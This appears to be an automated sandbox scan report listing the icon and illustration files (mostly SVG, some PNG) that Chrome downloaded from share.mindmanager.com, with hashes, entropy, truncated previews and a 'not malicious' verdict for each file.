                                                                Preview:<svg width="170" height="90" viewBox="0 0 170 90" fill="none" xmlns="http://www.w3.org/2000/svg">.<rect x="58.2832" y="11.5566" width="29.8188" height="28.6667" rx="2" fill="#CAFBF3"/>.<rect x="26.4326" y="11.5566" width="29.8188" height="28.6667" rx="2" fill="#FAEABF"/>.<rect x="90.0908" y="11.5566" width="29.8188" height="28.6667" rx="2" fill="#DFF1FD"/>.<rect x="121.899" y="11.5566" width="29.8188" height="28.6667" rx="2" fill="#DCE3FC"/>.<rect x="58.2832" y="42.3535" width="29.8188" height="10.6173" rx="2" fill="#CAFBF3"/>.<rect x="26.4326" y="42.3535" width="29.8188" height="10.6173" rx="2" fill="#FAEABF"/>.<rect x="90.0908" y="42.3535" width="29.8188" height="10.6173" rx="2" fill="#DFF1FD"/>.<rect x="121.899" y="42.3535" width="29.8188" height="10.6173" rx="2" fill="#DCE3FC"/>.<rect x="58.2832" y="55.0859" width="29.8188" height="32.9136" rx="2" fill="#CAFBF3"/>.<rect x="26.4326" y="55.0859" width="29.8188" height="32.9136" rx="2" fill="#FAEABF"/>.<rect x="90.0908" y="55.0859" wi
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):1188
                                                                Entropy (8bit):4.319906658380761
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:332782FFE335E81AEA0C7D1CBD8B8632
                                                                SHA1:2010EB98BBD2D1AAC1F389A6BD1DFEDAEC592B7A
                                                                SHA-256:BF204FDAEFF2A680CAD586C2D8542C00DDFFE5671C1045CC0410239D73EDF945
                                                                SHA-512:9BB496718E03BA85120072F9DB027282058952BF4FF78709FBD863DF70C5DFBEEED8A83FF70308B93DF74A4E6769E87D721E274CA15FDD8D5761F450CE5B6989
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/IconsSVG/email.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#1c97e6;}</style></defs><title>symbol_4_16</title><path class="cls-1" d="M15.26,7.39a6.83,6.83,0,0,1-.42,2.44,4,4,0,0,1-1.2,1.73,2.79,2.79,0,0,1-1.81.63,2.24,2.24,0,0,1-1.21-.33A1.86,1.86,0,0,1,9.86,11H9.72a3.17,3.17,0,0,1-2.55,1.19,3.43,3.43,0,0,1-2.58-1,3.75,3.75,0,0,1-.94-2.7A4.13,4.13,0,0,1,4.89,5.37a4.43,4.43,0,0,1,3.23-1.2,11.49,11.49,0,0,1,1.76.16,9.49,9.49,0,0,1,1.57.36l-.21,4.53c0,.85.24,1.28.7,1.28s.71-.29,1-.86a6.22,6.22,0,0,0,.35-2.27,5.46,5.46,0,0,0-.62-2.63A4.17,4.17,0,0,0,10.88,3a5.39,5.39,0,0,0-2.57-.6,6.48,6.48,0,0,0-3.25.77A5.18,5.18,0,0,0,3,5.38a7.3,7.3,0,0,0-.73,3.34,5.29,5.29,0,0,0,1.36,3.92,5.36,5.36,0,0,0,4,1.37,12.45,12.45,0,0,0,2.16-.22A14.69,14.69,0,0,0,12,13.15v1.78a11.12,11.12,0,0,1-4.39.84,7.64,7.64,0,0,1-5.48-1.85,6.71,6.71,0,0,1-2-5.14,8.61,8.61,0,0,1,1-4.15A7.28,7.28,0,0,1,4,1.71,8.43,8.43,0,0,1,8.29.65a7.84,7.84,0,0,1,3.64.83A6,6,0,0,1,1
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):38287
                                                                Entropy (8bit):4.237860863940104
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:4D41BD19989B6FFF186E4E1F6942318D
                                                                SHA1:2085A20393A2DD4109ED29C9C67BD5345805EFF2
                                                                SHA-256:29DBC192697CDEF429CEA1E54B4326E7F278D32F3B8FB9F89BE66C50707BE0F3
                                                                SHA-512:08D1EEA244340028851E6B33B3DDB7AC1662711C2ACC37EEC59EB2C923F083CC1CBFAD83CFD0A029B307F39E8692114E07CEB76CF16B7B36B50E8418CF11E667
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/cloud-templates/use-cases/cards/cards_strategy_analysis.svg
                                                                Preview:<svg width="200" height="250" viewBox="0 0 200 250" fill="none" xmlns="http://www.w3.org/2000/svg">..<g clip-path="url(#clip0_456_4545)">..<rect width="200" height="250" rx="10" fill="#CADEF7"/>..<path d="M107.032 64.3799C119.683 64.1291 132.439 61.2478 144.877 63.5734C167.605 67.8226 184.87 91.4847 181.982 114.425C179.094 137.365 156.502 156.009 133.43 154.492C125.978 154.002 118.332 151.72 111.203 153.947C101.703 156.915 95.8729 167.08 86.4301 170.228C73.642 174.491 57.384 163.791 47.5406 156.47C37.3869 148.919 25.6098 137.65 20.9146 125.572C16.0705 113.112 16.9385 96.604 20.5665 83.9566C23.8178 72.6206 31.994 63.0674 42.9007 58.4713C56.1952 52.8686 67.0461 57.0649 80.0028 60.8068C88.7822 63.3473 97.894 64.5518 107.032 64.3799V64.3799Z" fill="#AFCBEE"/>..<path d="M171.627 134.375H80.6116C78.0299 134.375 75.937 136.468 75.937 139.05V196.477C75.937 199.059 78.0299 201.152 80.6116 201.152H171.627C174.209 201.152 176.302 199.059 176.302 196.477V139.05C176.302 136.468 174.209 134.375 171.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:PNG image data, 16 x 12, 8-bit/color RGBA, non-interlaced
                                                                Category:downloaded
                                                                Size (bytes):297
                                                                Entropy (8bit):6.3908599215311295
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:A44D19B011203553B5EA665E9BF13CE4
                                                                SHA1:6FC53B728CA247464CC0B5BEE1DB8ACFAF4FDD55
                                                                SHA-256:EB648CAD0A5C31B853540E5D1BDE536CED8E3F2A58BE99E3AAB8E028A72D1F5D
                                                                SHA-512:605744D88893BE3F829F858A20C19A8C419C5FDCB045085101FDC4C97EAB216B1DB62CCDD52C9BDACE0EE3C01BF1A9A1E0D4E8394D80701E09AAB9453A9490A7
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/icon-tick.png
                                                                Preview:.PNG........IHDR.............k.=.....pHYs.................tEXtSoftware.Adobe ImageReadyq.e<....IDATx.b...?.)..... e....7..0.b.P.. ..$.H..@..@j>..!.....^..v.TA.._h....~4..........A.r....P. ..@.M3... }..B ~....4..jv@q!....\.b....0..:...~R4...'.?B5_..C..........5$..\7..........bUs.......IEND.B`.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):2384
                                                                Entropy (8bit):4.960525640345596
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:777155FA19AB692895D9A710C4BA652B
                                                                SHA1:74B1A11225EB43D671E75287D411173E89AB7112
                                                                SHA-256:4DB8FECE34CABA2BA7B8E288EE0EC4A8C6A33DF1C82D276BDABC7EBF9637F1F9
                                                                SHA-512:B515C7E4B00A9EEC36F28CB331D63899D270EBF8684F6F6FD4D0F25904ECD9A2DE9853980607B497E88DDB4DB84D97A1D538D1C13A5311340957E208A15906C1
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/cloud-templates/templates/scamperbrainstorming.svg
                                                                Preview:<svg width="170" height="90" viewBox="0 0 170 90" fill="none" xmlns="http://www.w3.org/2000/svg">.<rect x="18" y="32.3984" width="21.4416" height="16.6768" rx="3" fill="#C9E4F9"/>.<rect x="129.973" y="32.3984" width="21.4416" height="16.6768" rx="3" fill="#FBE7EE"/>.<rect x="108.531" y="58.6035" width="21.4416" height="15.4856" rx="3" fill="#FBE7E6"/>.<rect x="39.4414" y="58.6035" width="21.4416" height="15.4856" rx="3" fill="#DCE7C9"/>.<rect x="73.9844" y="70.5156" width="21.4416" height="15.4856" rx="3" fill="#FAEEDA"/>.<path d="M84.707 50.8613V66.9425" stroke="#FAEEDA"/>.<rect x="78.0605" y="37.666" width="13.2944" height="9.72081" rx="4.5" fill="#E0E0E0" stroke="#E0E0E0"/>.<rect x="48.9707" y="5" width="21.4416" height="15.4856" rx="3" fill="#A1CFF3"/>.<rect x="97.8105" y="5" width="21.4416" height="15.4856" rx="3" fill="#BAE7E7"/>.<path opacity="0.5" d="M77.5625 34.7812C76.9653 33.9452 75.293 32.0226 73.3819 31.0195C70.993 29.7656 66.2152 29.1386 63.2291 27.8847C60.243 26.6308 59.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):424
                                                                Entropy (8bit):5.135124355372358
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:8B58BD26E31D7040DA037A23DC475D6B
                                                                SHA1:4AE48E368802780B2B19014B409FAE3512160FD1
                                                                SHA-256:15853F01503ECEA127444E6FCA60B1D7DAA59ADA741F3EEE357330A460A97AD0
                                                                SHA-512:6F39C9116756969272DF652136905EA353DE1D7F9F72B83B73F2E186E818287F0F7CD16AFA82261DD05F60C2A4421993112673C2ADE822D5F8D8FBD6B12D876E
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/IconsSVG/stop.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#f03637;}.cls-2{fill:#fff;}</style></defs><title>signs_11_16</title><polygon class="cls-1" points="11.31 0 4.69 0 0 4.69 0 11.31 4.69 16 11.31 16 16 11.31 16 4.69 11.31 0"/><path class="cls-2" d="M10.49,2,14,5.51v5L10.49,14h-5L2,10.49v-5L5.51,2h5m.41-1H5.1L1,5.1v5.8L5.1,15h5.8L15,10.9V5.1L10.9,1Z"/></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):1989
                                                                Entropy (8bit):4.976741460198287
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:D232F25C24CADAB3CCB34507825A622E
                                                                SHA1:00034333233C69335C84FECC37DC8A8EED35A910
                                                                SHA-256:2627963AB5CADE9256F45A4013AC4FA7CA3B6C230CD00F228C2BB7E8B116B8A5
                                                                SHA-512:FA4660E757A80F8F179E5490B360FAF18D7A5EB7390E80EAEB9C35773A32146DDA6801E6F36A53A1982675C3A8FDDFE0000CA795AA209E8CB577AA8895A546F4
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/IconsSVG/meeting.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#1c97e6;}.cls-2{fill:#9a9aa3;}</style></defs><title>handshake_16</title><circle class="cls-1" cx="6" cy="8" r="4"/><rect class="cls-2" x="6.59" y="4.67" width="1.8" height="8.08" rx="0.9" ry="0.9" transform="translate(6.62 20.16) rotate(-135)"/><circle class="cls-1" cx="7.5" cy="9.5" r="3.5"/><rect class="cls-1" x="8.16" y="8.84" width="1.38" height="8.08" rx="0.69" ry="0.69" transform="translate(24.21 15.73) rotate(135)"/><rect class="cls-1" x="10.66" y="8.34" width="1.38" height="8.08" rx="0.69" ry="0.69" transform="translate(28.12 13.11) rotate(135)"/><rect class="cls-1" x="5.66" y="8.34" width="1.38" height="8.08" rx="0.69" ry="0.69" transform="translate(19.59 16.64) rotate(135)"/><path class="cls-1" d="M0,8H1.5S1,4,5,3.51V2H0Z"/><ellipse class="cls-2" cx="10.5" cy="8" rx="3.5" ry="3"/><rect class="cls-2" x="1.45" y="9.44" width="1.8" height="2.83" rx="0.9" ry="0.9"
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):1080
                                                                Entropy (8bit):5.119389964760753
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:E2FA7590ECB97022D1C2A0548B6580ED
                                                                SHA1:562AA9C8C7DCADE840A9B6132F9C288736B3EC8E
                                                                SHA-256:30D0E5D932786DE36373AAE97275304C6FF1E3E8C0DD83B9A9CC426C118CDD7E
                                                                SHA-512:1EB9933C6178A0C26F5B5CD1DDF35B1D441513509289C76570D708DC54B9F042E5D4E729C067C3646A6537EE8C5DACB360D8F7D5574AF2E1AA45DDD5E5869D8D
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/IconsSVG/rolodex.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#e6e6e6;}.cls-2{fill:#b3b3b3;}.cls-3{fill:#1c97e6;}.cls-4{fill:#999;}.cls-5{fill:#fff;}</style></defs><title>id_card_16</title><rect class="cls-1" x="0.5" y="3.5" width="15" height="10" rx="1.5" ry="1.5"/><path class="cls-2" d="M14,4a1,1,0,0,1,1,1v7a1,1,0,0,1-1,1H2a1,1,0,0,1-1-1V5A1,1,0,0,1,2,4H14m0-1H2A2,2,0,0,0,0,5v7a2,2,0,0,0,2,2H14a2,2,0,0,0,2-2V5a2,2,0,0,0-2-2Z"/><rect class="cls-3" x="2.5" y="5.5" width="4" height="6"/><path class="cls-2" d="M6,6v5H3V6H6M7,5H2v7H7V5Z"/><polygon class="cls-4" points="13 5 9 5 9 6 13 6 13 5 13 5"/><polygon class="cls-4" points="14 7 9 7 9 8 14 8 14 7 14 7"/><polygon class="cls-4" points="13 9 9 9 9 10 13 10 13 9 13 9"/><polygon class="cls-4" points="13 11 9 11 9 12 13 12 13 11 13 11"/><rect class="cls-5" x="4" y="7" width="1" height="1"/><polygon class="cls-5" points="5 7 4 7 4 8 5 8 5 7 5 7"/><rect class="cls-5" x="3" y="9" width="
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):1789
                                                                Entropy (8bit):5.238487708807177
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:2EF6FE794E5C4DD7531DFE40AD526669
                                                                SHA1:B374B6A133AE85DB2E962D17E30DC3079031E827
                                                                SHA-256:A03DB1C10CE2E9A42DE3B4A0E1F912C7D63B3EB8FB7C673FE5A84B70078FC4BC
                                                                SHA-512:E2DDFDF688BDF8C24A5AED9EBB3BA2EAACB7ACBD2FE705AF62E21E232112FA574E86F2D7F3AD15763DF4A273E72DE012CAA864ED5B4D3A39C6661405D136A007
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/loader/hourglass.svg
                                                                Preview:<?xml version="1.0" encoding="utf-8"?><svg width='24px' height='24px' xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100" preserveAspectRatio="xMidYMid" class="uil-hourglass"><rect x="0" y="0" width="100" height="100" fill="none" class="bk"></rect><g><path fill="none" stroke="#5c707c" stroke-width="5" stroke-miterlimit="10" d="M58.4,51.7c-0.9-0.9-1.4-2-1.4-2.3s0.5-0.4,1.4-1.4 C70.8,43.8,79.8,30.5,80,15.5H70H30H20c0.2,15,9.2,28.1,21.6,32.3c0.9,0.9,1.4,1.2,1.4,1.5s-0.5,1.6-1.4,2.5 C29.2,56.1,20.2,69.5,20,85.5h10h40h10C79.8,69.5,70.8,55.9,58.4,51.7z" class="glass"></path><clipPath id="uil-hourglass-clip1"><rect x="15" y="20" width="70" height="25" class="clip"><animate attributeName="height" from="25" to="0" dur="1s" repeatCount="indefinite" vlaues="25;0;0" keyTimes="0;0.5;1"></animate><animate attributeName="y" from="20" to="45" dur="1s" repeatCount="indefinite" vlaues="20;45;45" keyTimes="0;0.5;1"></animate></rect></clipPath><clipPath id="uil-hourglass-clip2"><rect x="15" y="55" wi
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):684
                                                                Entropy (8bit):4.823207451802938
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:F35800D331D1FA338D0784DF8F99386D
                                                                SHA1:CF7048FF32CCA07C757AB331F6E5A34074B0CF28
                                                                SHA-256:650959A5554C7137AC688C6CA8C123B50265BD8F28A5AB6B8CFADD456CDD1DCC
                                                                SHA-512:86EBDCF714467E5CA3F64BAC39B73F2827A91E09089B6AE646B19C902B3C47F95B793FAD2D69780AA93646CFB974DC3EC3A10BF0BB19E7E6FF588A18CEB317C5
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/IconsSVG/thumbs-up.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#32d140;}</style></defs><title>feedback_10_16</title><path class="cls-1" d="M15.91,8a1.39,1.39,0,0,0-1.38-1H10.14a1.46,1.46,0,0,1,0-.47,7.49,7.49,0,0,1,.81-2c.33-.58.46-3.32-.14-3.73a1.33,1.33,0,0,0-1.86.34L8.18,3.84,6.68,6C6.4,6.41,5,8,5,8v7.28L7.34,16h5.07a1.41,1.41,0,0,0,1.37-1,1.26,1.26,0,0,0,0-.86,1.32,1.32,0,0,0,1-1.29,1.33,1.33,0,0,0-.43-1A1.33,1.33,0,0,0,15.4,10.6a1.35,1.35,0,0,0-.44-1A1.33,1.33,0,0,0,15.91,8Z"/><path class="cls-1" d="M4,9v6H1V9H4m.48-1h-4A.52.52,0,0,0,0,8.52v7A.52.52,0,0,0,.52,16h4A.52.52,0,0,0,5,15.48v-7A.52.52,0,0,0,4.48,8Z"/></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:dropped
                                                                Size (bytes):514
                                                                Entropy (8bit):5.20000205684404
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:DA6EC99E5A048F07505B7E57903F2BDF
                                                                SHA1:6D571E343CA0FE80B4954869A5051B1B66586549
                                                                SHA-256:A99BFB2DE47524E47B95A8E3D83F8E5A0028D8C2D806B3F3657DA6D71074F91D
                                                                SHA-512:B0721F99A8D18816BADE86A98AF0BD3EBC8C01EE4B8905544FACAFEED7C495E5F7091EE84A3EFB8A422DF17DEFECB1B580B54A1FAC011140B27F4ECE91BA9158
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#48a7db;}.cls-2{fill:#eddc9a;}.cls-3{fill:#dbe7f0;}</style></defs><rect class="cls-1" width="16" height="16" rx="2"/><circle class="cls-2" cx="6" cy="5" r="2"/><path class="cls-3" d="M10.4,9,6.78,13.18a.5.5,0,0,0,.38.82H14.1a.5.5,0,0,0,.39-.81L11.16,9A.49.49,0,0,0,10.4,9Z"/><path class="cls-3" d="M4.89,10,2,13.17a.5.5,0,0,0,.37.83H7.75a.49.49,0,0,0,.39-.8L5.65,10A.49.49,0,0,0,4.89,10Z"/></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):4416
                                                                Entropy (8bit):4.154319651728468
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:308462E23C995C624FC97ABFE239D955
                                                                SHA1:A7948DC18913E909B19FF48196AFD5E7263AC4E4
                                                                SHA-256:307F5486BEDCB9093D3AA85C8BAB4D57818D5609003058B22B9F8B1BAEB4581D
                                                                SHA-512:D61F4986F6060C8301D882425BD5442000415859B1ADA8A27C13F975E0B3CDDF32295F5AA513659732BEBA8535DAAE707FFA4D8D78A18D958B7C5C7C15ECF3C3
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/navigation-panel/mouse-zoom.svg
                                                                Preview:<svg width="141" height="70" viewBox="0 0 141 70" fill="none" xmlns="http://www.w3.org/2000/svg">.<rect x="0.5" y="22.5" width="48" height="23" rx="4.5" stroke="#3B51A3"/>.<path d="M19.99 37.12C19.6566 37.12 19.3433 37.0633 19.05 36.95C18.7633 36.8367 18.5133 36.67 18.3 36.45C18.0866 36.23 17.92 35.96 17.8 35.64C17.68 35.32 17.62 34.9567 17.62 34.55C17.62 34.1433 17.6866 33.78 17.82 33.46C17.9533 33.14 18.1333 32.87 18.36 32.65C18.5866 32.43 18.8466 32.2633 19.14 32.15C19.44 32.03 19.7533 31.97 20.08 31.97C20.4 31.97 20.6733 32.0233 20.9 32.13C21.1333 32.2367 21.34 32.3667 21.52 32.52L20.96 33.27C20.8266 33.1567 20.6933 33.07 20.56 33.01C20.4333 32.9433 20.2933 32.91 20.14 32.91C19.74 32.91 19.4166 33.06 19.17 33.36C18.9233 33.6533 18.8 34.05 18.8 34.55C18.8 35.0433 18.92 35.44 19.16 35.74C19.4066 36.0333 19.7233 36.18 20.11 36.18C20.3033 36.18 20.4833 36.14 20.65 36.06C20.8233 35.9733 20.98 35.8733 21.12 35.76L21.59 36.52C21.3566 36.72 21.1 36.87 20.82 36.97C20.5466 37.07 20.27 37.12
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):945
                                                                Entropy (8bit):5.098472465942537
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:ACECB992B8D058E601CEC81D75F9B50B
                                                                SHA1:AB4271C5994A4CF7701507E34055EC1D3C0D8FA1
                                                                SHA-256:026313FD2803D827216451A4501F1FE9EC7033D56BA98B5AC51B8EA5D4231D17
                                                                SHA-512:51DCA519336CF209E5DB51E68D13BFA48AFEF7B2DACF9511232CFD0D77190E4C1A18603E2EB537680AE71E34E65D08F1C3C7C74C005F5D8708C889A015A34EE7
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/toolbar/svg/assets_bg_object.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><defs><style>.cls-1{fill:#7db7ea;}.cls-2{fill:#4f8ed4;}.cls-3{fill:#fff;}.cls-4{fill:gray;}</style></defs><title>insert shape</title><g id="Layer_2" data-name="Layer 2"><g id="Layer_2-2" data-name="Layer 2"><rect class="cls-1" x="6.5" y="6.5" width="17" height="17" rx="1.5"/><path class="cls-2" d="M22,7a1,1,0,0,1,1,1V22a1,1,0,0,1-1,1H8a1,1,0,0,1-1-1V8A1,1,0,0,1,8,7H22m0-1H8A2,2,0,0,0,6,8V22a2,2,0,0,0,2,2H22a2,2,0,0,0,2-2V8a2,2,0,0,0-2-2Z"/><polygon class="cls-3" points="13.5 18.5 13.5 16.5 11.5 16.5 11.5 13.5 13.5 13.5 13.5 11.5 16.5 11.5 16.5 13.5 18.5 13.5 18.5 16.5 16.5 16.5 16.5 18.5 13.5 18.5"/><path class="cls-2" d="M16,12v2h2v2H16v2H14V16H12V14h2V12h2m1-1H13v2H11v4h2v2h4V17h2V13H17V11Z"/><circle class="cls-3" cx="6.5" cy="6.5" r="6"/><path class="cls-4" d="M6.5,1A5.5,5.5,0,1,1,1,6.5,5.51,5.51,0,0,1,6.5,1m0-1A6.5,6.5,0,1,0,13,6.5,6.5,6.5,0,0,0,6.5,0Z"/></g></g></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):423
                                                                Entropy (8bit):4.888489423833627
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:BB1148ED78907AEE744A4D627659578D
                                                                SHA1:AF8D0D4DE5C51C6000484AD0D1DDD3136E1C23B0
                                                                SHA-256:CC7787E16B132677267AD5BDEC9799A5AF2E025DD8A6972BF5EC160B49A7558D
                                                                SHA-512:70F620262E53B7FD9056CD4E22B5616A06D298786FF8222CDC68B30A3D563306C7716BD2C58A97FFC8807549D651D0725D3EC86CB1B7CF6B21B5F13EAD6D23D4
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/IconsSVG/phone.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:gray;}</style></defs><title>phone_16</title><path class="cls-1" d="M4.22,5.93a13.41,13.41,0,0,0,5.86,5.85l1-1a.91.91,0,0,1,.9-.22,10,10,0,0,0,3.17.51A.89.89,0,0,1,16,12v3.11a.89.89,0,0,1-.89.89A15.1,15.1,0,0,1,0,.89.89.89,0,0,1,.89,0H4a.89.89,0,0,1,.89.89A10,10,0,0,0,5.4,4.06a.91.91,0,0,1-.22.9Z"/></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):943
                                                                Entropy (8bit):5.39540047041548
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:42482B5B2780042A2C518880B371F25A
                                                                SHA1:8FC1987F2A61491CF7114D354B049BB1C94A1FDD
                                                                SHA-256:B894F6547ED662C9D55620C85D400CCE56A48F02A6B957A606BF249440CBD7CA
                                                                SHA-512:CF22837DED8F1F4817F7EE7BD2D83A5F11176FAF40F7045F60395653532638E8202FB2B09200EC2863CFB75F93385EDF9661FB779684181AF6933DA59F4A97FD
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/toolbar/svg/assets_layout_top_bottom.svg
                                                                Preview:<?xml version="1.0" encoding="utf-8"?>.. Generator: Adobe Illustrator 19.1.0, SVG Export Plug-In . SVG Version: 6.00 Build 0) -->..<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px"... width="11.8px" height="23.4px" viewBox="0 0 11.8 23.4" enable-background="new 0 0 11.8 23.4" xml:space="preserve">..<g>...<path fill="#5c707c" d="M7.8,15.9H4c-2.2,0-4-1.8-4-4v-0.5c0-2.2,1.8-4,4-4h3.8c2.2,0,4,1.8,4,4v0.5C11.8,14.1,10.1,15.9,7.8,15.9z.... M4,9.4c-1.1,0-2,0.9-2,2v0.5c0,1.1,0.9,2,2,2h3.8c1.1,0,2-0.9,2-2v-0.5c0-1.1-0.9-2-2-2H4z"/>...<g>....<rect x="4.9" y="15.2" fill="#5c707c" width="2" height="4"/>....<g>.....<polygon fill="#5c707c" points="3.4,18.2 6.3,23.4 9.3,18.2 ..."/>....</g>...</g>...<g>....<rect x="4.9" y="4.2" fill="#5c707c" width="2" height="5"/>....<g>.....<polygon fill="#5c707c" points="9.3,5.2 6.3,0 3.4,5.2 ..."/>....</g>...</g>..</g>..</svg>..
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:PNG image data, 506 x 303, 8-bit/color RGBA, non-interlaced
                                                                Category:dropped
                                                                Size (bytes):29796
                                                                Entropy (8bit):7.980058333789969
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:210433A8774859368F3A7B86D125A2A7
                                                                SHA1:408BACDDC39F12CAD285579C102FE4A629862D88
                                                                SHA-256:9C6ADDFC339CE1C1D262290AB4CC2DE8D38D4B54B11A8E85AFD44FBB0ACC2561
                                                                SHA-512:6CBF6492BBA0734ECE1B595743B7A251D3C98425A36D5BF87EBFAD17BE979A23ADEE556FB074EF6D284052F6412ACEDA4E179FB7DFA0BA1103610CC01113A1A3
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:.PNG........IHDR......./.............sRGB....... .IDATx^.].XSI.=. M....T.`...X......}.]..}...e.k..{.(*V...`...o&..)i/......H2s..s.yo..Xa.0.......C@.....2f.C.!..`.0...`D..!..`.0..."F......Lc.0.......#z..............^..W......vEa..(R...W.o.J.km..k`.e.2.......`D.7.Z.w..!n......T....@..M.GO.892?+.....`.0...#...4..]n....{.Z....b...h..l.,...B.5b.0...........Vs......T...r.Wy...(..Gg..r....>&$.S.G.D.......]...I..S.....v.....9S.!..`.......F.'y3g...]+.fai.....T.....).%!.....{.7.u}}+a..p(X..]!...C.!.....l....W.Y..=[..K.wt...v....mD.5...ii....W.....z*#..0......D.....FV.w..,.T..............X.|..|.Let....F.d.W.Q.!..`....l...Wg..~.6./^..A.w..nE.}..`ff...S..p..>..!C.")).O.>E...9../?..+.b..H."p-R.N..X.h..&.!..`.h..6X...... ..33s..;Y...9u....c.w#..[^.suu...;%....W/.vymX<.2...`.0.4G....bx....C.vr+.5.I...h............8.".q...|v...[/....C.jUY\..9.!..`......5.t..K...-.R.4h....i..[\.N...<y,0j.l...G.z..7....H....e..y..R.N..(\.(....[.RSR..........w.......x.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text
                                                                Category:downloaded
                                                                Size (bytes):154894
                                                                Entropy (8bit):4.362336126861537
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:E3DEF9C8394D144140EC5FA82641935A
                                                                SHA1:138A6DE082A12E47302E66E591824A3D39F9A205
                                                                SHA-256:0138A2393475AFE2C4D075BC9CF22A84243B830610E9E3FB167F0293F514AB63
